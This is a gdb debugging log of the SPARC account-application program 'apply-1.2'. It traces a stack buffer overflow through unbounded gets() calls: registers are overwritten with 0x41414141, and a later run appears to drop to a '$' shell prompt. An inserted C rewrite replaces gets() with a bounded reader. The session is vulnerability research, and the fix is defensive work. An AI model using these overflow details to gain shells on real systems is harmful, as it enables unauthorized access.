                                                                                                              0x00011598 <Acct+216>:	nop
                                                                                                                                            ---Type <return> to continue, or q <return> to quit---0x0001159c <Acct+220>:	ld  [ %fp + -36 ], %g1
                                                                                                      0x000115a0 <Acct+224>:	cmp  %g1, 0x74
                                                                                                                                              0x000115a4 <Acct+228>:	bg  0x115d4 <Acct+276>
                                              0x000115a8 <Acct+232>:	nop
                                                                            0x000115ac <Acct+236>:	ld  [ %fp + -36 ], %g1
                                                                                                                              0x000115b0 <Acct+240>:	cmp  %g1, 0x3f
                      0x000115b4 <Acct+244>:	be  0x11824 <Acct+868>
                                                                      0x000115b8 <Acct+248>:	nop
                                                                                                    0x000115bc <Acct+252>:	ld  [ %fp + -36 ], %g1
       0x000115c0 <Acct+256>:	cmp  %g1, 0x70
                                              0x000115c4 <Acct+260>:	be  0x11600 <Acct+320>
                                                                                              0x000115c8 <Acct+264>:	nop
                                                                                                                            0x000115cc <Acct+268>:	b  0x11658 <Acct+408>
                             0x000115d0 <Acct+272>:	nop
                                                            ---Type <return> to continue, or q <return> to quit---0x000115d4 <Acct+276>:	ld  [ %fp + -36 ], %g1
                      0x000115d8 <Acct+280>:	cmp  %g1, 0x78
                                                              0x000115dc <Acct+284>:	be  0x11618 <Acct+344>
                                                                                                              0x000115e0 <Acct+288>:	nop
                                                                                                                                            0x000115e4 <Acct+292>:	b  0x11658 <Acct+408>
                                             0x000115e8 <Acct+296>:	nop
                                                                            0x000115ec <Acct+300>:	ld  [ %fp + 0x44 ], %o0
                                                                                                                               0x000115f0 <Acct+304>:	call  0x132d0 <show_info>
                                 0x000115f4 <Acct+308>:	nop
                                                            0x000115f8 <Acct+312>:	b  0x114f4 <Acct+52>
                                                                                                            0x000115fc <Acct+316>:	nop
                                                                                                                                            0x00011600 <Acct+320>:	sethi  %hi(0x25800), %g1
                                                0x00011604 <Acct+324>:	or  %g1, 0x260, %o0	! 0x25a60 <Acct_inst>
                                                                                                                     0x00011608 <Acct+328>:	call  0x13274 <blurb>
                     ---Type <return> to continue, or q <return> to quit---0x0001160c <Acct+332>:	nop
                                                                                                            0x00011610 <Acct+336>:	b  0x114f4 <Acct+52>
             0x00011614 <Acct+340>:	nop
                                            0x00011618 <Acct+344>:	sethi  %hi(0x13c00), %g1
                                                                                                0x0001161c <Acct+348>:	or  %g1, 0x180, %o0	! 0x13d80
         0x00011620 <Acct+352>:	call  0x257d8 <printf@plt>
                                                          0x00011624 <Acct+356>:	nop
                                                                                            0x00011628 <Acct+360>:	sethi  %hi(0x13c00), %g1
 0x0001162c <Acct+364>:	or  %g1, 0x1a8, %o0	! 0x13da8
                                                         0x00011630 <Acct+368>:	call  0x12a30 <askyorn>
                                                                                                       0x00011634 <Acct+372>:	nop
                                                                                                                                    0x00011638 <Acct+376>:	mov  %o0, %g1
                             0x0001163c <Acct+380>:	cmp  %g1, 0
                                                                   0x00011640 <Acct+384>:	be  0x114f4 <Acct+52>
                                                                                                                     ---Type <return> to continue, or q <return> to quit---0x00011644 <Acct+388>:	nop
                                                            0x00011648 <Acct+392>:	call  0x1320c <quit>
                                                                                                            0x0001164c <Acct+396>:	nop
                                                                                                                                            0x00011650 <Acct+400>:	b  0x114f4 <Acct+52>
                                            0x00011654 <Acct+404>:	nop
                                                                            0x00011658 <Acct+408>:	sethi  %hi(0x28c00), %g1
                                                                                                                                0x0001165c <Acct+412>:	or  %g1, 0x190, %g1	! 0x28d90 <ibuf>
                                                0x00011660 <Acct+416>:	ldub  [ %g1 ], %g1
                                                                                          0x00011664 <Acct+420>:	sll  %g1, 0x18, %g1
                                                                                                                                           0x00011668 <Acct+424>:	sra  %g1, 0x18, %o5
                                           0x0001166c <Acct+428>:	sethi  %hi(0x29000), %g1
                                                                                                0x00011670 <Acct+432>:	or  %g1, 0x2d1, %g1	! 0x292d1 <_ctype+1>
                    0x00011674 <Acct+436>:	ldub  [ %o5 + %g1 ], %g1
                                                                        0x00011678 <Acct+440>:	and  %g1, 0xff, %g1
                                                                                                                   ---Type <return> to continue, or q <return> to quit---0x0001167c <Acct+444>:	srl  %g1, 2, %g1
                                                                        0x00011680 <Acct+448>:	and  %g1, 1, %g1
                                                                                                                0x00011684 <Acct+452>:	cmp  %g1, 0
    0x00011688 <Acct+456>:	be  0x11814 <Acct+852>
                                                      0x0001168c <Acct+460>:	nop
                                                                                    0x00011690 <Acct+464>:	sethi  %hi(0x28c00), %g1
                                                                                                                                        0x00011694 <Acct+468>:	or  %g1, 0x190, %o0	! 0x28d90 <ibuf>
                                                        0x00011698 <Acct+472>:	call  0x2582c <atoi@plt>
                                                                                                        0x0001169c <Acct+476>:	nop
                                                                                                                                    0x000116a0 <Acct+480>:	mov  %o0, %g1
                             0x000116a4 <Acct+484>:	st  %g1, [ %fp + -20 ]
                                                                              0x000116a8 <Acct+488>:	ld  [ %fp + -20 ], %g1
                                                                                                                              0x000116ac <Acct+492>:	cmp  %g1, 0
                   0x000116b0 <Acct+496>:	ble  0x117fc <Acct+828>
                                                                       ---Type <return> to continue, or q <return> to quit---0x000116b4 <Acct+500>:	nop
            0x000116b8 <Acct+504>:	ld  [ %fp + -20 ], %g1
                                                              0x000116bc <Acct+508>:	cmp  %g1, 7
                                                                                                   0x000116c0 <Acct+512>:	bg  0x117fc <Acct+828>
       0x000116c4 <Acct+516>:	nop
                                    0x000116c8 <Acct+520>:	ld  [ %fp + -20 ], %g1
                                                                                      0x000116cc <Acct+524>:	cmp  %g1, 7
                                                                                                                           0x000116d0 <Acct+528>:	bne  0x11708 <Acct+584>
                               0x000116d4 <Acct+532>:	nop
                                                            0x000116d8 <Acct+536>:	sethi  %hi(0x13c00), %g1
                                                                                                                0x000116dc <Acct+540>:	or  %g1, 0x1d8, %o0	! 0x13dd8
                         0x000116e0 <Acct+544>:	call  0x257d8 <printf@plt>
                                                                          0x000116e4 <Acct+548>:	nop
                                                                                                            0x000116e8 <Acct+552>:	sethi  %hi(0x13c00), %g1
                 ---Type <return> to continue, or q <return> to quit---0x000116ec <Acct+556>:	or  %g1, 0x208, %o0	! 0x13e08
                                                                                                                                 0x000116f0 <Acct+560>:	call  0x257d8 <printf@plt>
                                          0x000116f4 <Acct+564>:	nop
                                                                            0x000116f8 <Acct+568>:	call  0x1320c <quit>
                                                                                                                            0x000116fc <Acct+572>:	nop
            0x00011700 <Acct+576>:	b  0x114f4 <Acct+52>
                                                            0x00011704 <Acct+580>:	nop
                                                                                            0x00011708 <Acct+584>:	sethi  %hi(0x25800), %g1
 0x0001170c <Acct+588>:	or  %g1, 0x260, %o5	! 0x25a60 <Acct_inst>
                                                                     0x00011710 <Acct+592>:	ld  [ %fp + -20 ], %g1
                                                                                                                      0x00011714 <Acct+596>:	sll  %g1, 2, %g1
                0x00011718 <Acct+600>:	add  %g1, %o5, %g1
                                                          0x0001171c <Acct+604>:	ld  [ %g1 + 0xc ], %g1
                                                                                                              0x00011720 <Acct+608>:	st  %g1, [ %fp + -24 ]
               ---Type <return> to continue, or q <return> to quit---0x00011724 <Acct+612>:	ld  [ %fp + -24 ], %g1
                                                                                                                      0x00011728 <Acct+616>:	add  %g1, 3, %g1
                0x0001172c <Acct+620>:	st  %g1, [ %fp + -24 ]
                                                              0x00011730 <Acct+624>:	ld  [ %fp + 0x44 ], %g1
                                                                                                               0x00011734 <Acct+628>:	add  %g1, 0x804, %g1
             0x00011738 <Acct+632>:	st  %g1, [ %fp + -28 ]
                                                              0x0001173c <Acct+636>:	ld  [ %fp + -24 ], %g1
                                                                                                              0x00011740 <Acct+640>:	ldub  [ %g1 ], %g1
           0x00011744 <Acct+644>:	sll  %g1, 0x18, %g1
                                                           0x00011748 <Acct+648>:	sra  %g1, 0x18, %g1
                                                                                                           0x0001174c <Acct+652>:	cmp  %g1, 0
    0x00011750 <Acct+656>:	be  0x117c0 <Acct+768>
                                                      0x00011754 <Acct+660>:	nop
                                                                                    0x00011758 <Acct+664>:	ld  [ %fp + -24 ], %g1
                                                                                                                                      ---Type <return> to continue, or q <return> to quit---0x0001175c <Acct+668>:	ldub  [ %g1 ], %g1
                                                                                          0x00011760 <Acct+672>:	sll  %g1, 0x18, %g1
                                                                                                                                           0x00011764 <Acct+676>:	sra  %g1, 0x18, %o5
                                           0x00011768 <Acct+680>:	sethi  %hi(0x29000), %g1
                                                                                                0x0001176c <Acct+684>:	or  %g1, 0x2d1, %g1	! 0x292d1 <_ctype+1>
                    0x00011770 <Acct+688>:	ldub  [ %o5 + %g1 ], %g1
                                                                        0x00011774 <Acct+692>:	and  %g1, 0xff, %g1
                                                                                                                   0x00011778 <Acct+696>:	srl  %g1, 3, %g1
                0x0001177c <Acct+700>:	and  %g1, 1, %g1
                                                        0x00011780 <Acct+704>:	cmp  %g1, 0
                                                                                           0x00011784 <Acct+708>:	bne  0x117c0 <Acct+768>
0x00011788 <Acct+712>:	nop
                            0x0001178c <Acct+716>:	add  %fp, -28, %o2
                                                                          0x00011790 <Acct+720>:	ld  [ %o2 ], %o5
                                                                                                                        ---Type <return> to continue, or q <return> to quit---0x00011794 <Acct+724>:	add  %fp, -24, %o4
                                                                          0x00011798 <Acct+728>:	ld  [ %o4 ], %g1
                                                                                                                        0x0001179c <Acct+732>:	ldub  [ %g1 ], %o3
                  0x000117a0 <Acct+736>:	inc  %g1
                                                        0x000117a4 <Acct+740>:	st  %g1, [ %o4 ]
                                                                                                0x000117a8 <Acct+744>:	mov  %o5, %g1
                                                                                                                                     0x000117ac <Acct+748>:	stb  %o3, [ %g1 ]
                                 0x000117b0 <Acct+752>:	inc  %o5
                                                                0x000117b4 <Acct+756>:	st  %o5, [ %o2 ]
                                                                                                        0x000117b8 <Acct+760>:	b  0x1173c <Acct+636>
      0x000117bc <Acct+764>:	nop
                                    0x000117c0 <Acct+768>:	ld  [ %fp + -28 ], %g1
                                                                                      0x000117c4 <Acct+772>:	clrb  [ %g1 ]
                                                                                                                             0x000117c8 <Acct+776>:	sethi  %hi(0x29400), %g1
                                ---Type <return> to continue, or q <return> to quit---0x000117cc <Acct+780>:	or  %g1, 0xdc, %g1	! 0x294dc <action>
           0x000117d0 <Acct+784>:	ld  [ %g1 ], %g1
                                                        0x000117d4 <Acct+788>:	cmp  %g1, 1
                                                                                           0x000117d8 <Acct+792>:	bne  0x117f0 <Acct+816>
0x000117dc <Acct+796>:	nop
                            0x000117e0 <Acct+800>:	sethi  %hi(0x25800), %g1
                                                                                0x000117e4 <Acct+804>:	or  %g1, 0x2b4, %o0	! 0x25ab4 <Acct_inst3>
       0x000117e8 <Acct+808>:	call  0x13274 <blurb>
                                                     0x000117ec <Acct+812>:	nop
                                                                                    0x000117f0 <Acct+816>:	clr  [ %fp + -32 ]
                                                                                                                                  0x000117f4 <Acct+820>:	b  0x1183c <Acct+892>
                                     0x000117f8 <Acct+824>:	nop
                                                                    0x000117fc <Acct+828>:	sethi  %hi(0x13c00), %g1
                                                                                                                        0x00011800 <Acct+832>:	or  %g1, 0x238, %o0	! 0x13e38
                                 ---Type <return> to continue, or q <return> to quit---0x00011804 <Acct+836>:	call  0x257d8 <printf@plt>
                                                                                                                                          0x00011808 <Acct+840>:	nop
                            0x0001180c <Acct+844>:	b  0x114f4 <Acct+52>
                                                                            0x00011810 <Acct+848>:	nop
                                                                                                            0x00011814 <Acct+852>:	sethi  %hi(0x13c00), %g1
                 0x00011818 <Acct+856>:	or  %g1, 0x258, %o0	! 0x13e58
                                                                         0x0001181c <Acct+860>:	call  0x257d8 <printf@plt>
                                                                                                                          0x00011820 <Acct+864>:	nop
            0x00011824 <Acct+868>:	sethi  %hi(0x25800), %g1
                                                                0x00011828 <Acct+872>:	or  %g1, 0x290, %o0	! 0x25a90 <Acct_inst2>
                                                                                                                                      0x0001182c <Acct+876>:	call  0x13274 <blurb>
                                     0x00011830 <Acct+880>:	nop
                                                                    0x00011834 <Acct+884>:	b  0x114f4 <Acct+52>
                                                                                                                    0x00011838 <Acct+888>:	nop
    ---Type <return> to continue, or q <return> to quit---0x0001183c <Acct+892>:	ld  [ %fp + -32 ], %i0
                                                                                                              0x00011840 <Acct+896>:	ret
                                                                                                                                            0x00011844 <Acct+900>:	restore
                                End of assembler dump.
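The Acct() menu loop as it reads off the disassembly above, written out in C as an added example (my reconstruction, not the apply-1.2 source): the dispatch mirrors the branches from Acct+180 onward, and the unbounded gets(ibuf) at Acct+80 is replaced by a bounded reader that keeps the original's EOF-becomes-"x" behaviour. struct application, menu_dispatch, read_menu_line, the MENU_* values and the buffer sizes are my own names and assumptions.

```c
/* Added example: the Acct() menu loop reconstructed from the disassembly
 * above, with gets(ibuf) replaced by a bounded reader. My reconstruction,
 * not the apply-1.2 source; struct application, menu_dispatch,
 * read_menu_line, MENU_* and the buffer sizes are assumed names/values. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define IBUF_LEN   64   /* assumed; the real size of ibuf is not visible here */
#define MENU_ITEMS 7

/* Stand-in for the field at offset 0x804 of Acct's argument (Acct+24..48,
 * Acct+624..772) that receives the account-type keyword. */
struct application { char type[16]; };

enum menu_result {
    MENU_EMPTY,      /* ibuf[0] == 0: back to the prompt   (Acct+140..172) */
    MENU_SHOW_INFO,  /* 't': show_info(app)                (Acct+300)      */
    MENU_REPRINT,    /* 'p': blurb(Acct_inst)              (Acct+320)      */
    MENU_EXIT,       /* 'x': askyorn(), quit() on yes      (Acct+344..404) */
    MENU_HELP,       /* '?': blurb(Acct_inst2)             (Acct+868)      */
    MENU_INVALID,    /* first byte is not a digit          (Acct+852)      */
    MENU_RANGE_ERR,  /* atoi() result outside 1..7         (Acct+828)      */
    MENU_ABANDON,    /* item 7: two printf()s, then quit() (Acct+536..572) */
    MENU_CHOSEN      /* items 1..6: keyword copied into app->type          */
};

/* Menu lines as printed in the session below (constructed copy). The binary
 * indexes its blurb table at n+3; here item n is simply acct_menu[n]. */
static const char *const acct_menu[MENU_ITEMS + 1] = {
    NULL,
    "1) ugrad    Undergraduate student enrolled in one or more CS courses",
    "2) grad     Graduate student enrolled in one or more CS courses",
    "3) alumni   Alumnus of Math and CS",
    "4) faculty  Member of the Math and CS faculty",
    "5) staff    Member of the Math and CS professional or classified staff",
    "6) crtsy    Courtesy account applicant that has spoken to the Sys Admin",
    "7)          None of the above.  (This will abandon the application!)",
};

/* Classify one input line the way Acct+180..768 does. On MENU_CHOSEN the
 * keyword after "N) " (up to the first blank) is copied into app->type; the
 * copy is bounded here, while the loop at Acct+636..764 has no bound. */
enum menu_result menu_dispatch(const char *line, struct application *app, int *item)
{
    int c = (signed char)line[0];          /* ldub + sll/sra 24: sign-extended byte */
    if (c == 0)   return MENU_EMPTY;
    if (c == 't') return MENU_SHOW_INFO;
    if (c == 'p') return MENU_REPRINT;
    if (c == 'x') return MENU_EXIT;
    if (c == '?') return MENU_HELP;
    if (!isdigit((unsigned char)c)) return MENU_INVALID;  /* _ctype digit bit, Acct+444 */
    int n = atoi(line);
    if (n <= 0 || n > MENU_ITEMS) return MENU_RANGE_ERR;
    if (n == MENU_ITEMS) return MENU_ABANDON;
    const char *src = acct_menu[n] + 3;    /* skip "N) " */
    size_t i = 0;
    while (src[i] && !isspace((unsigned char)src[i]) && i < sizeof app->type - 1) {
        app->type[i] = src[i];
        i++;
    }
    app->type[i] = '\0';                   /* clrb at Acct+772 */
    if (item) *item = n;
    return MENU_CHOSEN;
}

/* Bounded replacement for gets(ibuf) at Acct+80. Keeps the original's EOF
 * behaviour (a NULL return becomes the line "x", Acct+104..128), strips the
 * newline, and on an over-long line truncates and discards the remainder
 * instead of writing past buf. Returns 1 if input was truncated, else 0. */
int read_menu_line(FILE *in, char *buf, size_t len)
{
    if (fgets(buf, (int)len, in) == NULL) {
        snprintf(buf, len, "x");
        return 0;
    }
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
        return 0;
    }
    int ch, truncated = 0;                 /* no newline seen: drain the rest */
    while ((ch = fgetc(in)) != EOF && ch != '\n')
        truncated = 1;
    return truncated;
}

/* Feed a constructed input string through read_menu_line via a temp file. */
int read_menu_line_from_string(const char *text, char *buf, size_t len)
{
    FILE *f = tmpfile();
    if (f == NULL) return -1;
    fputs(text, f);
    rewind(f);
    int r = read_menu_line(f, buf, len);
    fclose(f);
    return r;
}
```

A caller declares `char ibuf[IBUF_LEN]` and loops on `read_menu_line(stdin, ibuf, sizeof ibuf)` followed by `menu_dispatch`, re-prompting on MENU_EMPTY, MENU_INVALID and MENU_RANGE_ERR as the binary does.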
(gdb) Breakpoint 1 at 0x11840
(gdb) Starting program: /home/bazz/latest/apply-1.2-stock/apply
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Welcome to -----, our host that handles account applications.

This program collects information needed to create accounts, and queues
applications for action by the system administrator.  When all your
information has been collected, you will have the chance to review your
application and re-enter any information that is not correct.

If you make a mistake in typing, you can back up on the line by pressing the
DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters --
your input may appear to have been fixed but will really contain garbage.
If you press the RETURN key before noticing an error, do not worry.  Simply
continue answering questions, and re-enter the information later during the
review phase.

Press RETURN to continue.
Do you already have an account with us (y or n)?
Enter your chosen login name.  It can be up to 8 characters long, and should
only use lowercase letters and digits.  Please use your first initial and
last name, as in jdoe, unless you have a strong preference otherwise.
Login name?
Please enter your full name.  Be sure to use upper and lower case, as in
John Q. Public.  It is very important to get this right, as this is how
your name will appear on lab access lists and in mail messages you send.
Full name?
Enter a password consisting of printable characters, spaces or tabs.
It can be as long as you like, but only the first 8 characters matter.
Do not use your login or real name in any form -- too easy to guess.
**-*-* Do not give your password to anybody under any circumstances! *-*-**

As you type in your password, characters will not be echoed to your screen.
This is to protect your account.  To be sure you did not mis-type anything,
you will be asked to enter your password a second time.

Password:
Again:


Please describe yourself by choosing one of these menu items:

1) ugrad    Undergraduate student enrolled in one or more CS courses
2) grad     Graduate student enrolled in one or more CS courses
3) alumni   Alumnus of Math and CS
4) faculty  Member of the Math and CS faculty
5) staff    Member of the Math and CS professional or classified staff
6) crtsy    Courtesy account applicant that has spoken to the Sys Admin
7)          None of the above.  (This will abandon the application!)
Menu item number [1-7] or command [tpx?] : You must select one of the choices.
Do you want to just forget the whole thing (y or n)? Menu item number [1-7] or command [tpx?] :
Program received signal SIGSEGV, Segmentation fault.
0x00011588 in Acct ()
(gdb) Undefined command: "rx".  Try "help".
(gdb) Value can't be converted to integer.
(gdb) g0             0x0	0
g1             0x31	49
g2             0x0	0
g3             0x0	0
g4             0x0	0
g5             0x0	0
g6             0x0	0
g7             0x0	0
o0             0x28d90	167312
o1             0x28d92	167314
o2             0x2919e	168350
o3             0x1	1
o4             0xff33c008	-13385720
o5             0x0	0
sp             0xffbefd40	0xffbefd40
o7             0x11510	70928
l0             0x41414141	1094795585
l1             0x41414141	1094795585
l2             0x41414141	1094795585
l3             0x41414141	1094795585
l4             0x41414141	1094795585
l5             0x41414141	1094795585
l6             0x41414141	1094795585
l7             0x41414141	1094795585
i0             0x41414141	1094795585
i1             0x41414141	1094795585
i2             0x41414141	1094795585
i3             0x41414141	1094795585
i4             0x41414141	1094795585
                                                                                                                  i5             0x41414141	1094795585
          fp             0x41414141	0x41414141
                                                  i7             0x41414141	1094795585
                                                                                          y              0x0	0
                                                                                                                 psr            0xfe001005	-33550331
         wim            0x0	0
                                 tbr            0x0	0
                                                         pc             0x11588	0x11588 <Acct+200>
                                                                                                  npc            0x1158c	0x1158c <Acct+204>
   fsr            0x0	0
                         csr            0x0	0
                                                 (gdb) (gdb) (gdb) Delete all breakpoints? (y or n) (gdb) Dump of assembler code for function askyorn:
       0x00012a30 <askyorn+0>:	save  %sp, -1152, %sp
                                                     0x00012a34 <askyorn+4>:	st  %i0, [ %fp + 0x44 ]
                                                                                                       0x00012a38 <askyorn+8>:	clr  [ %fp + -1044 ]
     0x00012a3c <askyorn+12>:	ld  [ %fp + -1044 ], %g1
                                                        0x00012a40 <askyorn+16>:	cmp  %g1, 9
                                                                                                   0x00012a44 <askyorn+20>:	bg  0x12b20 <askyorn+240>
          0x00012a48 <askyorn+24>:	nop
                                            0x00012a4c <askyorn+28>:	sethi  %hi(0x15000), %g1
                                                                                                0x00012a50 <askyorn+32>:	or  %g1, 0x328, %o0	! 0x15328 <_end+4039>
                             0x00012a54 <askyorn+36>:	ld  [ %fp + 0x44 ], %o1
                                                                               0x00012a58 <askyorn+40>:	call  0x257d8 <printf@plt>
                                                                                                                                  0x00012a5c <askyorn+44>:	nop
                    0x00012a60 <askyorn+48>:	add  %fp, -1040, %g1
                                                                    ---Type <return> to continue, or q <return> to quit---0x00012a64 <askyorn+52>:	mov  %g1, %o0
                     0x00012a68 <askyorn+56>:	call  0x25808 <gets@plt>
                                                                        0x00012a6c <askyorn+60>:	nop
                                                                                                            0x00012a70 <askyorn+64>:	ldub  [ %fp + -1040 ], %g1
                   0x00012a74 <askyorn+68>:	sll  %g1, 0x18, %g1
                                                                   0x00012a78 <askyorn+72>:	sra  %g1, 0x18, %g1
                                                                                                                   0x00012a7c <askyorn+76>:	st  %g1, [ %fp + -1052 ]
                        0x00012a80 <askyorn+80>:	ld  [ %fp + -1052 ], %g1
                                                                                0x00012a84 <askyorn+84>:	cmp  %g1, 0x59
                                                                                                                              0x00012a88 <askyorn+88>:	be  0x12ae0 <askyorn+176>
                                 0x00012a8c <askyorn+92>:	nop
                                                                    0x00012a90 <askyorn+96>:	ld  [ %fp + -1052 ], %g1
                                                                                                                        0x00012a94 <askyorn+100>:	cmp  %g1, 0x59
                      0x00012a98 <askyorn+104>:	bg  0x12ab8 <askyorn+136>
                                                                         ---Type <return> to continue, or q <return> to quit---0x00012a9c <askyorn+108>:	nop
                    0x00012aa0 <askyorn+112>:	ld  [ %fp + -1052 ], %g1
                                                                        0x00012aa4 <askyorn+116>:	cmp  %g1, 0x4e
                                                                                                                      0x00012aa8 <askyorn+120>	be  0x12af0 <askyorn+192>
                         0x00012aac <askyorn+124>:	nop
                                                            0x00012ab0 <askyorn+128>:	b  0x12afc <askyorn+204>
                                                                                                                0x00012ab4 <askyorn+132>:	nop
    0x00012ab8 <askyorn+136>:	ld  [ %fp + -1052 ], %g1
                                                        0x00012abc <askyorn+140>:	cmp  %g1, 0x6e
                                                                                                      0x00012ac0 <askyorn+144>:	be  0x12af0 <askyorn+192>
          0x00012ac4 <askyorn+148>:	nop
                                            0x00012ac8 <askyorn+152>:	ld  [ %fp + -1052 ], %g1
                                                                                                0x00012acc <askyorn+156>:	cmp  %g1, 0x79
                                                                                                                                              0x00012ad0 <askyorn+160>:	be  0x12ae0 <askyorn+176>
                                                         ---Type <return> to continue, or q <return> to quit---0x00012ad4 <askyorn+164>:	nop
    0x00012ad8 <askyorn+168>:	b  0x12afc <askyorn+204>
                                                        0x00012adc <askyorn+172>:	nop
                                                                                            0x00012ae0 <askyorn+176>:	mov  1, %g1	! 0x1
                                                                                                                                             0x00012ae4 <askyorn+180>:	st  %g1, [ %fp + -1048 ]
                                                0x00012ae8 <askyorn+184>:	b  0x12b24 <askyorn+244>
                                                                                                        0x00012aec <askyorn+188>:	nop
                                                                                                                                            0x00012af0 <askyorn+192>:	clr  [ %fp + -1048 ]
                                            0x00012af4 <askyorn+196>:	b  0x12b24 <askyorn+244>
                                                                                                0x00012af8 <askyorn+200>:	nop
                                                                                                                                    0x00012afc <askyorn+204>:	sethi  %hi(0x15000), %g1
                                        0x00012b00 <askyorn+208>:	or  %g1, 0x338, %o0	! 0x15338 <_end+4055>
                                                                                                                     0x00012b04 <askyorn+212>:	call  0x257d8 <printf@plt>
                          0x00012b08 <askyorn+216>:	nop
                                                            ---Type <return> to continue, or q <return> to quit---0x00012b0c <askyorn+220>:	ld  [ %fp + -1044 ], %g1
                        0x00012b10 <askyorn+224>:	inc  %g1
                                                                0x00012b14 <askyorn+228>:	st  %g1, [ %fp + -1044 ]
                                                                                                                        0x00012b18 <askyorn+232>:	b  0x12a3c <askyorn+12>
                               0x00012b1c <askyorn+236>:	nop
                                                                    0x00012b20 <askyorn+240>:	clr  [ %fp + -1048 ]
                                                                                                                    0x00012b24 <askyorn+244>:	ld  [ %fp + -1048 ], %i0
                        0x00012b28 <askyorn+248>:	ret
                                                            0x00012b2c <askyorn+252>:	restore
                                                                                                End of assembler dump.
                                                                                                                      (gdb) Breakpoint 2 at 0x12b28
    (gdb) Num Type           Disp Enb Address    What
                                                     2   breakpoint     keep y   0x00012b28 <askyorn+248>
                                                                                                         (gdb) Delete all breakpoints? (y or n) (gdb) Breakpoint 3 at 0x12b28
                              (gdb) The program being debugged has been started already.
                                                                                        Start it from the beginning? (y or n) Starting program: /home/bazz/latest/apply-1.2-stock/apply
                                         (no debugging symbols found)
                                                                     warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
               (no debugging symbols found)
                                           (no debugging symbols found)
                                                                       (no debugging symbols found)
                                                                                                   (no debugging symbols found)
                                                                                                                               (no debugging symbols found)
            (no debugging symbols found)
                                        (no debugging symbols found)

                                                                    Welcome to ----, our host that handles account applications.

                                                                                                                                            This program collects information needed to create accounts, and queues
                                                                    applications for action by the system administrator.  When all your
                                                                                                                                       information has been collected, you will have the chance to review your
                                                               application and re-enter any information that is not correct.

                                                                                                                            If you make a mistake in typing, you can back up on the line by pressing the
                                                         DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters --
                                                                                                                                    your input may appear to have been fixed but will really contain garbage.
                                                              If you press the RETURN key before noticing an error, do not worry.  Simply
                                                                                                                                         continue answering questions, and re-enter the information later during the
                                                                     review phase.

                                                                                  Press RETURN to continue.
                                                                                                           Do you already have an account with us (y or n)?
             Breakpoint 3, 0x00012b28 in askyorn ()
                                                   (gdb) Continuing.

                                                                    Enter your chosen login name.  It can be up to 8 characters long, and should
 only use lowercase letters and digits.  Please use your first initial and
                                                                          last name, as in jdoe, unless you have a strong preference otherwise.
Login name?
            Please enter your full name.  Be sure to use upper and lower case, as in
                                                                                    John Q. Public.  It is very important to get this right, as this is how
            your name will appear on lab access lists and in mail messages you send.
                                                                                    Full name?
                                                                                               Enter a password consisting of printable characters, spaces or tabs.
                    It can be as long as you like, but only the first 8 characters matter.
                                                                                          Do not use your login or real name in any form -- too easy to guess.
               **-*-* Do not give your password to anybody under any circumstances! *-*-**

                                                                                          As you type in your password, characters will not be echoed to your screen.
                      This is to protect your account.  To be sure you did not mis-type anything,
                                                                                                 you will be asked to enter your password a second time.

         Password:
                      Again:


                            Please describe yourself by choosing one of these menu items:

                                                                                         1) ugrad    Undergraduate student enrolled in one or more CS courses
              2) grad     Graduate student enrolled in one or more CS courses
                                                                             3) alumni   Alumnus of Math and CS
                                                                                                                   4) faculty  Member of the Math and CS faculty
                 5) staff    Member of the Math and CS professional or classified staff
                                                                                       6) crtsy    Courtesy account applicant that has spoken to the Sys Admin
               7)          None of the above.  (This will abandon the application!)
                                                                                   Menu item number [1-7] or command [tpx?] : You must select one of the choices.
                  Do you want to just forget the whole thing (y or n)?
                                                                       Breakpoint 3, 0x00012b28 in askyorn ()
                                                                                                             (gdb) $ unknown mode: cooked
$ $ $ $ $ $ (gdb) $ $ (gdb) $ $
$
$ exit
(gdb) x/96x $sp
0xffbef8c0:     0x000291a0      0x00028d91      0xff000000      0x00ff0000
0xffbef8d0:     0x0000ff00      0x81000000      0x7efefeff      0x81010100
0xffbef8e0:     0x00000000      0x00029190      0xff343a54      0x00000000
0xffbef8f0:     0xff33c008      0x00000000      0xffbefd40      0x00011630
0xffbef900:     0x00000000      0xff342fb0      0x00013da8      0x00000000
0xffbef910:     0x000292d1      0x00000024      0x00013da4      0x80000000
0xffbef920:     0x00000000      0x0000006e      0x00000000      0x00000000
0xffbef930:     0x6e414141      0x41414141      0x41414141      0x41414141
0xffbef940:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef950:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef960:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef970:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef980:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef990:     0x41414141      0x41414141      0x41414141      0x41414141
---Type <return> to continue, or q <return> to quit---
0xffbef9a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9b0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9c0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9d0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9e0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9f0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa00:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa10:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa20:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa30:     0x41414141      0x41414141      0x41414141      0x41414141
(gdb) i r
g0             0x0      0
g1             0x6e     110
g2             0x0      0
g3             0x0      0
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0xffbef930       -4261584
o1             0xffbeff72       -4259982
o2             0x2919e  168350
o3             0x1      1
o4             0xff33c008       -13385720
o5             0x0      0
---Type <return> to continue, or q <return> to quit---
sp             0xffbef8c0       0xffbef8c0
o7             0x12a68  76392
l0             0x291a0  168352
l1             0x28d91  167313
l2             0xff000000       -16777216
l3             0xff0000 16711680
l4             0xff00   65280
l5             0x81000000       -2130706432
l6             0x7efefeff       2130640639
l7             0x81010100       -2130640640
i0             0x0      0
i1             0x29190  168336
i2             0xff343a54       -13354412
i3             0x0      0
